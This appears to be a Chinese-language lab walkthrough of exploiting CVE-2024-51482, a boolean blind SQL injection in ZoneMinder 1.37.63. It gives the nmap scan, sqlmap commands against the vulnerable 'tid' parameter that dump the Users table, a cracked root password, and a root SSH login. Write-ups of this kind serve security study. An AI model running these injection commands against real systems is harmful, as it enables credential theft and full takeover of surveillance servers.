# CVE-2024-51482

## 建立立足点

### 信息收集

* 使用Nmap对目标系统的开放端口进行扫描，获取到2个开放端口：22 / 80

```bash
nmap -sC -sV -p- -oA cve51482 192.168.147.116 --open
```

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2Fam7Z6nVMlGsSQKtZakrs%2F1.png?alt=media&#x26;token=bc3afc94-02cd-4548-8547-92cc43f3bb2f" alt=""><figcaption></figcaption></figure>

* 检查80端口上的内容，发现当前目标系统正在运行的软件及其版本号：**ZoneMinder v1.37.63**

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2F64gdB249ysLbtX0tFevo%2F2.png?alt=media&#x26;token=ffa3bd1b-db1e-4651-960b-e14fc1c3b9c6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FHwmKDMFZ9Q6DVxNE7M7D%2F3.png?alt=media&#x26;token=ac21ebb0-6539-41c7-acf4-6ddc148a68b1" alt=""><figcaption></figcaption></figure>

### 漏洞查阅

* 根据已得知的软件zoneminder v1.37.63，查找相关漏洞得知该版本的zoneminder有SQL布尔盲注漏洞：

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FeiUljocoMCBECr8uvwkY%2F4.png?alt=media&#x26;token=6c8426ae-a095-4ea2-808f-79a021683374" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2F2a1xmNcZRiby60PtvYcQ%2F5.png?alt=media&#x26;token=ce55b1b8-07d3-4ef1-a098-29b3de12544b" alt=""><figcaption></figcaption></figure>

### 漏洞利用

* 使用SQLmap进行注入测试：

```bash
sqlmap -u "http://192.168.147.116/zm/index.php?view=request&request=event&action=removetag&tid=1"
```

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FKW5jn7aNIPrSoBvWEwEH%2F6.png?alt=media&#x26;token=cca19c8b-3566-4a38-a6d6-fe6cabe1d9e5" alt=""><figcaption></figcaption></figure>

* 检测当前目标系统存在布尔盲注漏洞：

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2Fy1b6Hvurq7b2vBMl499Q%2F7.png?alt=media&#x26;token=a83cb27c-e18c-4eea-8017-4ed0a1777b02" alt=""><figcaption></figcaption></figure>

* 获取到db名：zm

```bash
sqlmap -u "http://192.168.147.116/zm/index.php?view=request&request=event&action=removetag&tid=1" --dbs
```

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FyhKDZMNiGLfOMogzwDFm%2F8.png?alt=media&#x26;token=a086a44c-6dd9-4b4e-bf5d-33a0dfcbc6ff" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2Fdyi7SY8tHXZZwvDIkxkd%2F9.png?alt=media&#x26;token=220eba56-33dd-4503-b231-b95c93e9950b" alt=""><figcaption></figcaption></figure>

* 获取到tables名：

```bash
sqlmap -u "http://192.168.147.116/zm/index.php?view=request&request=event&action=removetag&tid=1" -D zm --tables
```

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2Fr4dODHTB99I5pW0rsIpT%2F10.png?alt=media&#x26;token=f5cb3611-eadf-4675-9fe1-e5ebd7369353" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FValeqpmohz23cLp3kqGP%2F11.png?alt=media&#x26;token=264d1858-bd66-4cb2-8235-c5be29fd3181" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FqOWKsRTXxrN0igfV0YBV%2F12.png?alt=media&#x26;token=a7c75c9d-83af-43e0-86f2-92b4a3fc3030" alt=""><figcaption></figcaption></figure>

* 获取columns名：

```bash
sqlmap -u "http://192.168.147.116/zm/index.php?view=request&request=event&action=removetag&tid=1" -D zm -T Users --columns
```

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FY24HKKPNDQznRRLEjvqk%2F13.png?alt=media&#x26;token=8f424f84-2698-4aaa-bdd3-f6f459501915" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FgOR4QXgy02R4ixfMAtrr%2F14.png?alt=media&#x26;token=cc92e5d3-6944-455d-96b5-e639b3b8c260" alt=""><figcaption></figcaption></figure>

* 获取users名：root

```bash
sqlmap -u "http://192.168.147.116/zm/index.php?view=request&request=event&action=removetag&tid=1" -D zm -T Users -C Username --dump
```

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FWOITONG1XqpDE1v8k9le%2F16.png?alt=media&#x26;token=7282ac85-5e32-41f3-a5b6-57896115dfe6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FrW0iOyrWmlo7Ij2qJjjI%2F17.png?alt=media&#x26;token=3f3e3a32-f78c-4119-8366-7409ef292b8b" alt=""><figcaption></figcaption></figure>

* 获取password（哈希暴破），最终获取到用户名和密码：**root : killzone**

```bash
sqlmap -u "http://192.168.147.116/zm/index.php?view=request&request=event&action=removetag&tid=1" -D zm -T Users -C Password --dump
```

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FIfss3B18gEGYA2n9MW0i%2F18.png?alt=media&#x26;token=2b841b45-b29b-4c65-956d-3fca9f5a13b5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FGlmIhft8XysNekg9OrVu%2F19.png?alt=media&#x26;token=509aa35e-96b7-4c1a-8a32-dcb14dc48cb0" alt=""><figcaption></figcaption></figure>

### ROOT

* 利用有效凭证**root : killzone**进行ssh登录，获取到了shell：

```bash
ssh root@192.168.147.116
# 输密码：killzone
```

<figure><img src="https://2397184341-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPnN90gBB8RUE7PyNl8zi%2Fuploads%2FuQCGqNRPzlqP8wEKuLHR%2F20.png?alt=media&#x26;token=8be19d98-d0fc-470c-b772-f565177c107c" alt=""><figcaption></figcaption></figure>
